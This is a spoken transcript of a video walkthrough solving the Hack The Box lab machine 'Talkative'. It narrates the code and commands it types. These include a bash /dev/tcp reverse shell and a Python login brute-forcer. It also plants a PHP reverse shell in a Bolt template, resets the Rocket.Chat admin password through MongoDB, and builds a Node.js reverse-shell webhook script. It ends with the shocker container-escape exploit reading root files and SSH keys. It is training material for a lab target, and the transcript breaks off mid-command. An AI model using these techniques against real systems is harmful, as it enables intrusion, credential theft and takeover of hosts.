Well, hello everyone, this is Mohammad Badruddin and today we are going to solve another machine from Hackthebox, and the machine name is Talkative and a difficulty level of that machine is hard. So let's go. Without wasting time, we are gonna start that machine from the reconnaissance phase, and especially the active reconnaissance, and we will start it with nmap. So nmap space hyphen s capital V for the version enumeration, space hyphen s capital C for the default scripts, and the IP address of the target machine, which is 10.10.11.155, and I want to save the scan results in default.nmap. So because to save the time, I already ran the scan, so let's go and I will show you the scan results. So if you see the scan results here, you can see pretty awesome. The first one is port number 22, which is TCP port, and this port is default for SSH, but the thing is here the state of this port is filtered. The second port is port number 80, default for HTTP, port state is open, but the service running is Apache HTTPD 2.4.52. And now if you see the HTTP title, it did not follow the redirection, and you will get the domain name. So I already created a record in etc host file with the respective IP address, and so that I can access the web application with the name. Another port open here is port number 8080, and on port number 8080 there is another application running, which is gmov. We will see that in a minute, but the service is Tornado HTTPD 5.0, and there is Tornado server. On port number 8081, again this is for HTTP, and the service running is same as before, as above, which is Tornado HTTPD 5.0. On port number 8082, again the port is open using HTTP service, and the service running is Tornado HTTPD 5.0. But the interesting part here, so if you see the service information host, so the host IP here is 172.17.0.17. So this is, we can consider it as our Docker container IP, because if I show you the default Docker container IP range is 172.17.0.0. This is the default network subnet for the Docker container once you install, but it could be other things, it could be something else, but we can consider. Nice. So let's go clear that, and let's go see. We will see what's running on what port. So this is the port number 80, and talkative / http:// talkative.htb and colon, let's see what's running on port 8080, and there is gmov, right? Again http:// talkative. Instead of port 8080, let's try port number 3000. What's running on port number 3000? We will see that in a minute. So this is gmov. Okay, first thing first, I'm going to see the page source first on this. So gradient matching your branding, what is that, beer.com. okay. So person, this is Matt Williams, Saul Goodman. Go down. Up to now nothing seems interesting. So this application is somehow related or attached with the application running on port 3000, but this 3000 port is filtered. So we will keep in mind this point for the further enumeration and further testing. Okay, go down, search. There is board CMS. Okay, board CMS. Is there, we missed something? Bold. So talkative.htb content is bold. Is that built on board? We need to check. And on click action is bold/forms. So bold is the directory, and inside that directory there is file forms, or it could be again the directory. But the thing is, I think bold CMS is somehow here, and we need to test it. So for testing, I come back here, what web, and http://talkative.htb. Hit enter. This will actually give you the information what kind of web application is that, on which platform, on which framework that application built. So, and this is very, very important information in terms of enumeration and gathering information. So as you can see, it's using Apache 2.4.52, and this is the email. Again, this is on Linux platform. It could be Debian. This is the IP of the target, and meta generator gives you the application is Bolt, and it's built on PHP 7.4.28. So this is very, very interesting. And you can see here also there are some headers which is X powered by, and in that header you can see there is PHP 7.4.28 Bolt and XUA compatible to Internet Explorer Edge. Fine. So if we see here, let's say /Bolt, come on, /Bolt, hit enter, we have something, and we got a login page. So this is interesting because normally we did not get that if we did not see the page source. So this is very important to see each aspect. Okay. The second thing is, because we don't have the username password for this, so back to another application, that is Gemovie, and let's see if there is some kind of version information there or not. And what this application actually do, I do not know, because this is the first time I see the Gemovie, and the version of this application is 0.9.5.5. So I just go here and I will say Gemovie. Maybe it is open source and we will get it on GitHub. The second thing is, let's see, search exploit and Gemovie, if there is any exploit in the database. So there is no exploit in the database. Gemovie GitHub. So go to the GitHub and there is Gemovie. So JMV, I'm going to that, and there is Gemovie and other files. I see everything, but to be very honest, I see this application Gemovie first time in my life, and most importantly, I see and I learned that there is a programming language known as R programming. So because once you come to the Gemovie, you will see there is R, and inside there is RJ editor, but what this do, we don't know. So when I go to this repo and when I go to this R, and I see all these files have extension .r. So I go to see what is .r files. An R file is a script written in R, and what is R? R is a programming language used for statistical analysis and graphing purposes. It contains code that can be executed within the R software environment. R files may include commands that create objects, functions, values, etc. That means this is the R programming language, and within this language, with that language, you can also execute the code. So once I see execute the code, I can again search how to run system commands in R. Fine. And invoke system command. Just try this. And come here, open this. So there is with the system function, you can run the system command, invoke the system commands, and within the curly braces you can put the commands. So go down and you will get a syntax here. So this is the syntax. So I wanna try this on this R editor, and keep in mind in the bottom you can see that to execute the command you have to press Ctrl plus Shift plus Enter. So I just put that here, and let's see, I wanna execute command, let's say who am I, and then Ctrl Shift Enter, and as you can see the command execution is successful. So let's try another command, which is ls space -la and Control Shift Enter, and yeah, that's working. So if we can execute the command, we can get the shell. Okay, so to get the shell, let's say bash space -c and bash space -i greater than ampersand, and then /dev/tcp/ my IP is 10.14.14.31, so 31, and slash, let's say port number 9090. Fine. Now go back here and clear nc space -nlvp on port number 9090. So we are listening here, and Control Shift Enter to execute that, character 0, and we got the shell, but it's interrupted. No job controlled in the shell. Okay, because here 0 and greater than %1. Now again come back here, clear, Control Shift Enter, and this time we got the shell. So ls space -la, you get the same result what we got from the RJ editor terminal. So cd, go to the home directory and ls space -la. So you can see here we got a file which is bolt-administration.omv. Let's see what file is this. Hit enter, and this is an zip archive. This is an archive file, zip archive data. So let's see what's inside this file, but this is the zip. Unzip, we can unzip it here or not. Unzip, paste selection. So unzip command is not there. Very well. ifconfig. Why I am worried about ifconfig command? Because once we see the result of nmap, we can see here we got the host which is 172.170.17, and here as you can see the host name, and that I'm pretty sure that this is the domain this is the Docker container. So if this is the Docker container, we cannot directly access this machine from my machine. Okay, so let's see which Python 3, and this is very limited shell. You can see we do not have ifconfig command to run, and Python is there, which nc, so netcat is also not there. But if I try to say Python 3 space -m http.server on, let's say port number 1234, and hit enter, so the server is started. But once we try from here wget http://, so what IP you need to put here, let's say 10.10.11.155 and :1234/ we need to download this file. So paste selection and hit enter, and you can see failed connection refuse. Of course connection will be refused because this HTTP service is running on IP 172.17.0.17 in the Docker container, not on the host machine or base machine, right? So I'm going to exit from here, clear that, and I'm gonna use another approach with poncat CS. So it is same like netcat, but it is very enhanced, and it will give you a lot of flexibilities and features, so you can download and upload the files directly without any HTTP server, right, or without netcat. So poncat-cs space -lp and 9090. So we will listen on this port, and you can install it very easily. You can go to the Google and search for poncat-cs. It will give you the command to install it. So, and I will also put the link in the description section. You can get it from there. So just hit enter to listen on this port. Now you can see it's listening. Go back to jmovie and just Control-Shift-Enter to execute the command again. And here you can see we got the reverse shell. So it's receiving the connection. It will take a moment. And there you go. So the first terminal you will get here is the local poncat terminal. From here you can download, upload, and you have many features like you can see download, and there is upload to, where is it, this one. So we need to download the file, and we already know the name of the file and the location of the file. So let's go. So download, and we need to download it root/bolt-administration.omv, and we need to download it in the present working directory. Copy that, paste it here, hit enter, and it is start downloading. So if I come here, ls space -la, you can see we have this file. Now come here in the folder and just extract this file. So extract here, and we got that. So come here, and there is one file, JSON file, which is xdata. So if you open this file, you will find there are few emails and its respective passwords. So these are the passwords. Fine, but we don't know which password is correct, which username is correct. So we will actually going to filter few things. Okay, then from here to here, just hit enter. Again from there up to here, just hit enter. Up to the first password, and again hit enter. Done. So I'm going to save this file, save as, and save as in the Talkative users.txt. Hit enter. Then what I need to do here is delete these and Control X from here. Save this, create one more file, and paste the passwords here, and save this file as passwords.txt. Fine. So we created these two files. Okay, and here let's put few more users like admin, root, administrator, like this. So just save it and come back here. You can see, because we got this login page, so maybe one of these user and one of these password is correct. And for this to check, I'm going to write very quickly a little Python script. So let's see, shebang /user bin env and python 3 import request import url lib3 and import Okay, that's enough, I think. Fine. Now the thing is, if you come here and go to the page source, in the page source you will find few things. The first thing is this login token, and the better thing is to open the burp suite so that we can capture the request one time. So login token you have, and this field is hidden. That means in every request of the login, in every login request with the username and password, you will also get the token. Okay, so close that. You can see there is login username and login password should be there. Field login password. So we will see more accurately in the burp suite. So put that here and come here. Let's try admin 123456 and start the burp proxy. Enable the burp proxy on your browser, just log in. So we get the request here, go to the post request, which is, come on, this one. And here you can see we have, go to the inspector, there you can see. So we have login username, which is admin, login password, fine, and login remember is equal to 1, that is not a big deal, and login token. So the token is this. We need to find out that in every request the token is same or it get changed, because before creating a script you must know the behavior of the application, so that on that basis you can build your script. So again here we get request, another post request. So it started with 9f3d, and go to that post request, and here you can see it started from 8. That means the token value every time will get changed. So we need to grab before post request, we need to grab the token every time. That's it. So let's go and we will build that. So and because we need to grab the token every time, so from bs4 import beautiful soap, fine. So url lib3 dot disable underscore warnings, fine, so that we do not get warning every time. Then proxies equal to and here we need to put the proxies. So http proxy, and the URL of that proxy is my localhost, and the port number is port number 8080, and https proxy, and I'm again going to use http for on the place of https with the same URL, right? Now next thing is let's say session is equal to, because we need to get the session, request dot session, fine. So it will actually grab the session and it will not lose the session between the get request and the post request, fine. Now the URL is going to be, let's say http://talkative dot htb/bold/login. This was the URL, I think. Yeah, bold/login. So next thing, now we are going to create a method which is def get underscore request, and that request need URL. So r is equal to session dot get, because we are going to take every request from the session, from this session, right? So session dot get, and it is going to be URL is equal to URL comma proxies is equal to proxies. Fine. Now the response is going to be res is equal to be r dot text. Fine. And let's say we will have the cookie from that or not. So cookies equals to session dot cookies dot get underscore dict. This is to grab the cookie, because there are cookies to PHP session ID, this one. Fine. So come back here, and that seems perfect. Now we need to grab the token. So to grab the token, I'm going to use beautiful soup. So soup is equal to beautiful soup, and first of all put the response. From the response we need to grab it, but we need to first put it in a specific format, which is going to be HTML dot parser. Fine. Now let's just save it first, and I'm gonna save it as brute.py. Hit enter. We get some colors, so we will know things are going correctly. Okay. From this HTML parser format of the response, we are going to get the token. So I'm gonna say token is equal to soap.find, and what I need to find is come here. So if you see, the token is in the input tag, and the name of this parameter is login, and in the big bracket underscore token, and this is the value. So we need to grab it from the input tag, where the name is this and the value is this, right? So the tag is input tag. Fine. And in the curly braces, name of the tag is name, and the value of it is what is this one. So copy that and paste it here. Fine. And we need to get it its value. So dot get and value. So it will grab the value. So let's try to see if it's working perfectly or not. So token, print token, and print cookies. So cookies, and we need to call here this function. So get underscore request, and it needs URL. So URL value we already defined it here. So save it and just run it one time, and we need to run it here. So cd desktop Hackthebox and Talkative plus clear python 3 and brute.py. Hit enter. Hopefully that will work. Okay, this is the first time we did not get any error. So this is the token and this is the session ID. And if we go to the burp suite, because we are sending the request through the burp proxy, so every time we run this script, it request will go through the proxy. So this is the request, and if you see here, so this is the session ID LJD2. So you can see LJD2, and the token is 70D6. So come down, and 70D6. So we are getting the good results. Now we need to go for the post request. So now instead of printing that, we need to return the value, right? So return, and let's return token only. First thing, we will see if without session ID it will, or without cookie it will work or not. If without cookie it works, with just a token, so it is okay. Or maybe it will even work with the same token, but maybe sometimes some applications actually validate the tokens and the session IDs. So in that case, with the same session ID and same token, the request will not work. Okay, so def, and this time I'm gonna post underscore request, and this request again need URL 1 2 3 4, and then so first thing first, here I'm gonna read the pass underscore file, and this is going to be /root/ desktop and /htb, inside htb talkative /passwords passwords.txt, which is this file. Right, so now just read this file. So with open and pass underscore file, and we need to read it, so R as out file. Now we need to save its content as variable passwords, where I'm gonna say out file dot read and split wherever you see the new line. Fine. Now I'm going to run a loop. So passwd in passwords, so it will take each one by one password from this passwords and process that. Fine. Now user underscore file, here I'm going to read user file, so user file path is also same, copy paste and users.txt. So users.txt, where is it? This one. And I'm going to save the time, just I'm going to paste these two lines, copy, come here, paste that, and here instead of pass file I need to put user underscore file, and let's say out file 1, and here I'm gonna say users, and from out file 1 dot read and split. Fine. Now again I'm going to run another loop for users, for user in users. So it will take one by one user. So it will, in the first loop it will take one password from passwords, and in the second loop it will take one user from users, and that will create the data for the post request. Right. So first of all we need token for the post request. So token is equal to this, we are going to call this method here, and it will grab the token for us. Fine. Second thing what we need is data. So data is going to be in the curly braces dictionary. Data is going to be, come here, and post request grab it, and I'm going to grab it from here. I can copy, yeah, I can copy it. Token up to now here, copy, and come back here, just put it here. Now we need to arrange it a bit. So single quote here, then single quote here, and instead of equal to sign there should be, and instead of admin the value is going to be user. So user, right? Now comma, the second parameter it needs password. Okay, instead of equal sign we need this, and instead of password we need passwd, this one. So copy, come here, paste that, comma, and the last one, remember we can put it like this. Let's take remember is 1 or remember is 0, so that it should not remember the thing. 0, and then comma, single quote, token, and the value of the token is this. So we put it here, token. Fine. So we get the token, we get the data. Now we need to send the request. So R1 is equal to session, or let's try, we have the token, but we need to take it from the session. Take it from the session, we will see it what's going on. So session dot post, because this is a post request, URL is equal to URL, comma, data is equal to data, comma, proxies. So proxies equals to proxies. Fine. And then let's say allow underscore redirect is equal to false. So why we put redirect is equal to false? I don't want application to I don't want this request to follow the redirection. So we get here, we match it like if r1 dot status underscore code equal 302. So if it will not redirect, we will get the status code 302, and it will redirect to the home page or the user page like this. So if the status code is equal to 302, which is redirection code, then it is gonna print maybe I need I have to record this video in 2 sections because it is gonna be long. Match found, and n, and then let's say plus, and we can say password for space plus user plus and space is plus passwd. So on any username password, if it gets redirection, it will print this. That's it, and then it will break. So break, save it, and hopefully this will work fine. We just need to call this function. So post underscore req and URL, save it. And one more thing I want to do is here I don't want proxies, so save it and just go and execute that. And I want to Control A, delete the selected item. Now clear, and just run the brute.py. So we got one error, we always do. So copy that, save that, and go back here, run this again, and we get here anything? No, we do not. Allow redirect. Oh, that is allow redirects s, DIRECTS. Save it and come here, clear. Let's run it again. And yeah, this time we are getting request, all the post requests. So go to the first request, and here you can see this is the token. In the second request, the token is changed. In the third request, the token is changed. So if the application have security to validate this token, to check this token whether this token is unique every time or not, so in that case this is very good to check every time, take every time from the GET request the new token and put it in the request. So as you can see here, match found, and we get a password for admin user. That's good. So let's go, and we are going to log in as admin. So copy this, because in the user folder, user file, we put admin, root and administrator, because the default user for Bolt is admin. So maybe the password is reused. Okay, so come back here. I don't need this. Login, and username is admin, and the password is this. So copy, come back here and just paste that. Login, don't save. Let's see. And yeah, we logged in. That's perfect. So now there is we need to check out the version. So the Bolt version is Bolt version 5.1.3. So if you check the CVEs or exploits or vulnerabilities for this version, you will find few vulnerabilities. So if I go to the configuration, actually there are two vulnerabilities, and from both of these vulnerabilities you can get the reverse shell, and you can run the code, inject the code. So if you go, first thing, if you go to the configuration, fine, and go to the all configuration files, and there is bundles.php, and actually you can edit this file. So if you edit this file and put here the reverse shell, PHP reverse shell, you will get the reverse shell. And the second thing is, if you go to the file management and view and edit templates, so you will get few templates here. So the last template is this one, the updated one, so base 2021. If you come here, you will see it uses twig. So if you go to the SSTI in Hacktricks, and or you can go to the payload all the things, you will find the twig section there. So I'm going to open this twig file, and here if I put something like, because this is the main block, and here if I put to test 7 into 7, which should be 49, and save the changes. So after saving the changes, you need to go to the maintenance, and in the maintenance go to clear the cache, and after clear the cache, come back to the http://talkative.htb, clear the cache, and as you can see here, there is 49. That means this application is also vulnerable to server-side template injection. Fine. So you can use SSTI, or you can use this approach to get the reverse shell from PHP. So for that, what you need to do here is come back here, clear that, go to copy, user share, and let's say web shells, and inside web shells there should be PHP, and inside PHP, oh come on, inside PHP there is PHP backdoor, PHP reverse shell. So I need this PHP reverse shell, and copy this here in the same folder. Now you must have here the PHP reverse shell, this one. So just open this file and come here, change this IP to attack box, which is 10.10.14.31. My IP is 31. Keep forgetting everything. Yeah, 31. So 31, and here the port, let's say 4545. Fine, save it, Control A and copy this content, go back here and Control A, delete this and paste your content. So you can see here that this is perfect. We got this. Now we just need to listen here. So I'm going here, just exit this session, exit from this session and clear that, and again on the PwnCat I'm going to listen on port number 4545. It's listening, and now we here need to save changes. Fine. Okay, after saving changes, just try to access this file one more time and it should get the connection. So from both of these approach you can get the reverse shell. So there are server side template injection and PHP code execution. Fine. So we got the shell here and we just need to write back. So if we go to help, you can see here back return to the remote terminal. So try back, hit enter and reset. The command is clear for the Linux, but here in PwnCat we use reset to clear the terminal. Right, now let's say ls space -la is there. So this is again the Docker container, but this is another Docker container because you can see the name of the Docker container. If config, hit enter and command not found, same like before. There is net state space -tlpn. Let's see, again command not found. So let's see, root, no command. So how we will know? Host name space -I. So yeah, this is the Docker container. Fine. So we can consider, because the users we got here, like we don't need that, and don't need this one. Again this one we don't need. So these Seol, Janet and Matt, these users on the system. So what we can do here is we can consider that the Docker container IP is which belongs to system is 172.17.0.1. So if I show you here on my PC, ifconfig, hit enter, so you can see the Docker container IP is 172.17.0.1. So we can consider this IP is there for the local system, and this is the local, means your base operating system will communicate to the Docker containers through this IP. So whenever you create any Docker container, that will get the IP of this subnet but not 0.1. Maybe the first container will take 0.2, then 3, then 4, 5, 6, 7, 8, 9, 10. And whenever you make the connection from your machine to Docker container or from Docker container to your machine, it will use this gateway. Fine. So let's try it to SSH, because SSH was filtered on the initial nmap scan. So maybe from this Docker container will have the SSH. So again reset, and we will try SSH. And because if you go to the Talkative side, the Seol user is the CEO. Come back here. So Seol user is the CEO. So this user is interesting for me, and we can try this user, and make sure you make the SSH connection on 172.17.0.1. Hit enter, and yeah, yes, and it's asking for the password. So I'm gonna try the same password we have before, and the password was where is it? Come here, open recent passwords.txt. This was the password, so I'm gonna try this. If it's not, then we will try another password or another user. Paste and hit enter, and we got the connection. So in that way we get the Seoul user, and now we get the access on the local machine. You can see the host name is Talkative now. And here you can see there are Docker 0 have 172.17.0.1 IP. There is one more interface which is 172.18.0, and this is the Ethernet 0 IP address, and this is the IPv6 for Ethernet 0. So that's perfect. Now let's go and we will enumerate the system more. Clear, ls space -la. We are already in the home directory of Seoul, and there is users.txt. So cat user.txt, hit enter, and this is the user flag. Clear this. Okay, let's try to enumerate. So let's see, sudo space -l, paste the password, and it cannot run the sudo. Net state space -tlpn, hit enter, and (8081, 8082) we already got these ports. On 6000 there is running something, but all these in the 3000. Let's see what's running on 3000. We can actually make the port forwarding on the 3000, because 3000 was filtered and we cannot access the 3000 port before. So if I come here and try port number 3000, hit enter, as you can see, it will not open because that port was filtered. So this is the first thing we need to do. Second thing, let's put the PSPY 64 on this. Clear, and Python 3. Let's see first whether wget is there or not. Which wget? Hit enter, and there is wget. So Python 3 space -m http dot server on port number 80, and come here, cd/temp, inside temp wget http://10.10.14.31/pspy64 and hit enter. Okay, chmod plus x and pspy64, hit enter, clear, and let's run the pspy now. pspy64. So we can see here on the pspy there is one cron job running, and in that cron job it's going to copy one file from inside the root.backup/passwd and put it as etc in the file passwd. Then it is going to run again the same thing with the bash sh terminal, and then it is going to execute a Python file which is inside root.backup, and the file name is update_mongo.py, and again running the same command with bin sh. But the thing is, we did not get MongoDB port. First of all, I am going to copy this, come back here and paste that. Okay, now back and Control C, clear, net state space -tlpn. So the default port for MongoDB is I don't need burp now. Close it. So default port for MongoDB default port, and the default port is 27017, which we do not find here. Let's see, net state space hyphen net, so maybe it is netted, and yeah, it is netted, because we are logged in on 172.17.0.1, which is we are logged in from the machine, but maybe this port is on the Docker container, and it is on the Docker container which is 172.17.0.2. So there is it. Fine. We need to take this, copy, come back here and just paste that here. So now what we need to do here is we can do two things. The first thing, we can make port forwarding for the 3000. Okay, for the port 3000. And the second thing, we can make port forwarding for this MongoDB, because you can see there is MongoDB on the Docker container or wherever. And wget http://10.10.14.31/ chisel x64. Hit enter, and yeah, okay, we get the chisel here. So chmod plus x and chisel. Hit enter. Now let's start the chisel server here on the attack machine. So chisel x64, and it's gonna be the server space hyphen p, let's say 7777, and hyphen reverse. Hit enter, and here we need to start it as client. So client, and then the target is 10.10.14.31, and the port number is 7777, and make R for reverse, and 27017, 127.0.0.1, and 27017. Hit enter. We should get here the hit, and we got it. So that means now we can access the MongoDB on this port with the local host. Clear that. Now to access the MongoDB, we must have the Mongo tool, and the Mongo tool we need is Mongo sh, which we already installed. If you want to install it, I will put the link in the description section. You can go to that. And install it. So Mongo sh and MongoDB : //127.0.0.1, and that's it. How you can access it, or you can specify the port. Yeah, you must specify the port. Yeah, that's it. So go to the MongoDB, and the session is closed. Why? Let's see one more time whether the session is still established. Yeah, it's still established. Clear, and run it one more time. So it's gonna be MongoDB : //127.0.0.1, 27017. Hit enter. Connecting to that, and again it is closed. Oh, okay. The problem is because the MongoDB is actually on, where is it? Come on. The MongoDB is on this host on 172.17.0.2 and we make the port forwarding on 0.1. So that is the problem. Clear that. And this time here we put it on localhost. This is the problem. So we need to mention 172.17.0.2. Fine. Hit enter. We must get a hit here. Yeah, we got it. Now come back here, clear that and try to access it again. Connecting to that, and this time hopefully we will get it. Yeah, so now we got its initial syntax of queries is same like SQL, but this is actually no SQL. So show databases, and there are databases. Let's go try to see use admin, and we are in the admin. Show tables, and there are not much tables. Okay, try use Meteor. Actually, why I'm using this Meteor, because in the initial nmap scan, once I go to the default.nmap, you will find here that in the port number 3000 you will find there is Meteor CSS underscore resources is equal to true, and there is a class of Meteor. So something is matching in between. So go to that and show tables, and there are users table. So to see the users table, db.users.find, and in that way you can get the content of this file, right? There is actually Rocket Chat, and Rocket Chat local. This is the password, and the password is in bcrypt. Okay, the role is admin and the name is Saul Goodman, and the username is admin. So let's try again. There is a problem. So Rocket Chat, not Rocket Chat games. Okay, I put Rocket Cat, sorry, my bad. Is it Rocket Cat? Yeah, Rocket Cat is there. That what I know is Rocket Chat is the application for the chatting. Let's go to the documentation. And if you go here in the administration, then we need to go to the admin panel, and in the last you will find advanced admin setting, and go to the restoring an admin user. And inside restoring admin user, you will find that updating admin password, and this is how you can update the admin password. So here we have two queries. The first one is this, and the second one you can choose one of them according to the scenario. So you can either use one-time access token, and you can update the admin password to 12345. So, and you can run this query. So I'm going to copy this query, and come back to the terminal and just put that here. So user is user administrator, but we don't have administrator user. So we have admin user, right? Come back here, there is admin. and this is the password, and this bcrypt value is actually 12345. So now just hit enter to update the password, and as you can see, acknowledged is true, matched count is 1, modified count is 1. So we successfully updated the password for the administrator. Now just exit from here and go back to this terminal, cancel, control C, clear, and this time I am going to again make the 3000, and let's come here and make 3000 port. So I'm going to port forward the 3000 port. Okay, oh sorry, clear, because not on this Docker container, not in the Docker container. Let's see, net state space hyphen tlpn to see whether it's running on the main machine or it's running on there. So because we got it in the nmap scan, we got it from the main machine because we scan the main IP. So that means it's running on the main, yeah, there 127. So the chisel command should be like this, 127.0.0.1, and hit enter and come back here. And now let's try to access that on 127.0.0.1 and hit enter, and this time we will get the application. And as you can see, Talkative Rocket Chat, so not the Rocket Cat. Now we can log in with the admin user because we changed the password to the admin to 12345 and hit enter. Don't save the password, and we get into the application. So that little sound from this application. Now if I come here, go to administration, and here I actually wanna see the version information. Where is it? Yeah, here is it. So the version is 2.4.14. so let's try to let's try to search for the vulnerability. So Rocket Chat version 2.4.14, 2.4.14, yeah, hit enter. Exploits, here we can see we got few things, security fixes, and this is for version 3. Rocket Chat 2. New release, this one. So if we go up, let's go to see whether the exploit is available on GitHub, and there is one exploit of 2021. So let's open this one and we will see what's in it. So there is exploit.py. Okay, what we need to do here is we create the integration with the, okay, there is RCE, authenticated admin. So this condition is apply on us. The first vulnerability is hijacking users account. The second vulnerability is privilege escalation to admin authentication, to admin authenticated. This is also apply on us, but the thing is, so admin user is most likely to be protected by two-factor authentication. So this condition not matches to us. The third one is RCE, remote code execution, authenticated administrator. So Rocket.chat has a feature called integrations that allows creating incoming and outgoing webhooks, and these webhooks can have scripts associated with them that are executed when the webhook is triggered. So we create an integration with the following script. and then we can trigger the webhook to get the RC comes into the picture. And this is the code from where we can execute the code. Okay, so we can do this. Let's go and we will try it. So this is the application, and if we see here, it's asking for go to the integration, and once we go to the integration, we should find to create some webhooks. So there is incoming webhook and outgoing webhook, but we need to use incoming webhook. Where is it? So we go to integration and we found this page, and we need to make new integration according to this POC. Fine. In the new integration, we need to come to this new incoming webhook, and here we need to enable it first. Then let's say any name. I'm gonna say hello, and here we can put this, copy, paste that. So the user which already exists is admin. Then we can leave these because these are optional, and enable a script here, and then we can put the script. So const require is equal to console.log.construct constructor, and then return process dot main and module. Because if we see here, this gonna be main module dot require dot require. Fine, and then close the brackets, semicolon, and we need to change a bit. So where net, and net is equal to require net comma cp is equal to require, and we need to require the child process. So child underscore process, and then comma, we need sh is equal to, let's say, cp dot spawn, and what we need here is bin slash bash or slash bin slash sh. So and then put it here and the semicolon. Fine. Now just where client, and client is equal to new net dot socket, and we need to define the socket here. So client dot connect, and it should connect on, let's say, port number 1234, comma, the IP address of the attacking machine, which is 10.10.14.31, and then let's say comma function braces client dot pipe, and it should pipe sh dot stdin semicolon. Then what we have here is sh. So wait a moment, that should be okay. So sh dot std out dot pipe, and inside we have to define the client. We call the client, and then let's say sh dot stderr dot pipe and client. Fine. Then semicolon, and here also it should be semicolon. So we again verify for a moment. So constant require console.log constructor, and it is gonna return process dot not this slash main module dot require. Okay, then we are going to create a variable named as net, and then it's require net. Another one is cp, it's gonna require the child process, and then at last sh, which is going to cp.spawn and bin sh. Fine. Now we are defining a new variable which is client, and it is net.socket. So client.connect, and it is going to connect on this socket with the function. Then it is going to pipe sh.std in and sh.std out to the client. So this is gonna std in with the sh, and it is gonna std out with the client, and then stder pipe client. So we created that. Now here come here and come here, clear this screen. Come on, clear poncat -cs -lp and 1234 port number. So we need to listen on this port number. Okay, it's listening. Go back here and save the changes. Changes are saved. Now back to the integration. Here you will find your incoming webhook which we created named as hello. Click on it, and here you will find, oh, there is a syntax error. It should be where, not care. So okay, I'm going to copy this. We can edit that or not. Let's see. Okay, copy that and go back to the integration. Here we cannot. Okay, we cannot edit. So let's paste that. Constant where, come on, where, and then delete that and delete that, and it should be here, that should be here, and the last one is sh.stderr.pipe, and inside we have to call client. Fine. And then at last we have to close this. So curly braces and this, and then semicolon. Fine. So this time that seems okay. Okay, save this. Back to the integration. Come here. This time that seems perfect. And once you come here, you will find the webhook URL. So I'm going to copy this URL and go back to the terminal. Here I am going to call it with the curl. So clear that and curl curl, and then paste the hooked URL. Just hit enter, go back to the terminal, and it should get the, okay, come back again. Let's try this one more time, but this time instead of this I'm gonna say talkative.htb and hit enter. That should work. We still didn't get any response, so exit from here and try to listen on that port again. Now go back here and let's just delete this one, delete this webhook. Okay, it's deleted. Now go back to the new integration, incoming webhook, enable that, name as hello, post should be with this general, so hash general, and then post as admin. Come here and enable the script, and just what I made, I just copy it. So let's see, the problem is where. Oh, the problem maybe here, that should be capital, case sensitive. So let's save this time. Rest of the things seems okay. Okay, so we saved it. Go back to the integration and go to the webhook, and we need to just copy this webhook. So copy that, come back here, and instead of that we paste it here. Let's see, yeah, this is different, so delete this one. Now come here, or here we can make a horizontal connection. Fine. Curl and just paste that, hit enter. It's successful and we got the connection here. So it will take a moment to activate the connection, and let's go. So we need to put the back. This will get us, oh, this is another Docker container, and ls space -la. There are npm, okay, cd slash let's see, space ls space -la space in the home directory. Let's see what it has in the home directory. So there is bash history, rocket chat, importer, and UFS. Now reset to clear the screen. ls space -la. I want to check first the environment. So we need to keep in mind this is Docker container, and okay, let's see the capabilities. So the command to check the capabilities is cap sh, and there is no cap sh is there. Okay, but we can see the capabilities in another way. So if we go to cd proc, and in the proc there is a directory which is self ls space -la, and inside self there should be status, and this status file contains the capabilities information. So cat status, hit enter, and here you can see the capabilities inherit, capabilities perm, and bind, and amb. So we can check the capabilities by decoding this. So just take this and Control Shift C to copy it, and come to your machine, clear, because we have cap sh, and just hyphen decode, I think, and paste that. No, it's hyphen decode. So clear and hyphen dash decode again. Let's see, hyphen decode, where is it? Decode is equal to, I cannot remember everything, so equal to this, and yeah, we got it. So here you can see we have certain capabilities: cap change on, cap DAC reader search, and cap f owner. These all the capabilities we have. These are the capabilities. Fine. So one by one, if we see what kind of exploitation we have, or what kind of vulnerability if we have these capabilities enabled. So let's see, we will start it with I know the change on will not work. We will start it with cap dac read search. So let's see if we have any vulnerability on this capability if enabled on a system. So paste that exploit. Let's see if there is any exploit on that or not. So there is exploit capabilities part 2, and this is the GitHub. So I will go to this. I don't need that, and I don't need that. So this is the example, and this is the pull request, pull 27. HTTP stealth openworld.net x export shocker.c. Let's open that. Okay, so this is the file. We need to copy this, then compile it, and then send the file to the target, and we need to execute that file. So I'm going to Control A, copy this, Control C, come back here, open a new window, and here paste that and save it, and save it as shocker.c. Hit enter and come back here, and we can cd desktop htb and talkative clear ls. So shocker.c should be there, and we can make it with gcc, compile it with gcc. So gcc shocker.c space -o shocker. Fine. But before that, actually rm space -rf shocker clear ls shocker.c. I need to see the source, but here what you need to see, actually you can see this section, which is get a fs reference from something mounted in from outside. So come back here, go to the last, to that function, this function, and here I'm going to say, let's see, /etc/ hostname, and let's call /root root.txt. okay, so save this file, go back to the terminal, and this time gcc shocker.c space -o shocker, and we compile this file. So if I say ls, there should be shocker, yeah, this one. Now we need to send this file to the target machine. Let's see if there is wget, and there is not. So okay, leave, exit, Control C, and that hangs. So if this is hang, I can open new horizontal and leave that hang. cd desktop Hackthebox and Talkative, and here I can start one more poncat -cs space -listen port 1234, hit enter. It's listening. Now here I'm gonna again curl the incoming webhook, which was that, hit enter, and it should get connection. So one thing which is important, that you can see here we have in the Talkative directory, and there we also have the Talkative directory, and from this directory we will actually download the upload the file, which is shocker. So download shocker shocker to temp slash shocker. Error, why so? Upload shocker. Let's try to copy it in the root shocker. So it's downloaded successfully. Now we just need to execute that. So back to get the shell and cd, come here, cd slash root ls space -la. There is shocker. Fine. So chmod plus x shocker and clear. Let's just reset, and we need to execute that shocker and hit enter. Enter, and there you go. So you can see we got the root flag here. Fine. Now we can try if there is, you can see it also show you what are the directories in the slash root directory. There is .ssh. So we can try to get id_rsa, and for that we have to again go through the same process. What you need to do here is you need to call etc.ssh, and here you need to call id_rsa, or let it host name. You can just do like .ssh slash id_rsa. Fine. So just save that, and again we need to come here, rm space -rf shocker, delete that, and again compile with the new configuration file what we make the changes, etc host and root.ssh_id_rsa. Now again you need to upload this file here, and the problem is again the same. You have to exit from this session. Let's say logout work. No logout, no login session, use exit. Exit, exit. Oh, come on. And it come back. Just say exit, and it again, or I am not executing the right command, don't know. Just make it more horizontal. I don't want to make this video too long, which it already is. So desktop, Hackthebox and Talkative, clear, and oncat cs space -lp 1234, hit enter. It's listening. Come here and execute this command again. It's get the connection. Now we again need to upload that, and we can actually do one more thing. Horizontal, let's say vertical, open a vertical, cd desktop, Hackthebox and Talkative, clear, and oncat -cs -lp 1234. It's again listening, and again if we execute this command, so it's again getting connection. Now it's better because we can upload from one terminal and we can see from another terminal. So here I'm going to first we need to remove that file. So I'm going back here and cd/root, fine, ls, it has shocker, so rm space -rf 